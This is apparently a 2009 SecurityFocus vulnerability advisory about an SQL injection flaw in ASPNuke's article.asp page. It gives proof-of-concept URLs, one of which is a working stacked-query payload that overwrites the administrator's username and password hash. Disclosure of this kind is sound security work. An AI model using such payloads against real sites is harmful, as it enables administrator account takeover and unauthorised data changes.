Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

ASPNuke Article.ASP SQL Injection Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/module/article/article/article.asp?articleid='[SQL_INJECTION]

oil_karchack has supplied the following proof of concept exploit that will set the administrator username and password:
http://www.example.com/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf
4ca831485ba0da56328f818763ed34c72ca96533802c' , username='trapset'%20where%20userID=1%20--







 

Privacy Statement
Copyright 2009, SecurityFocus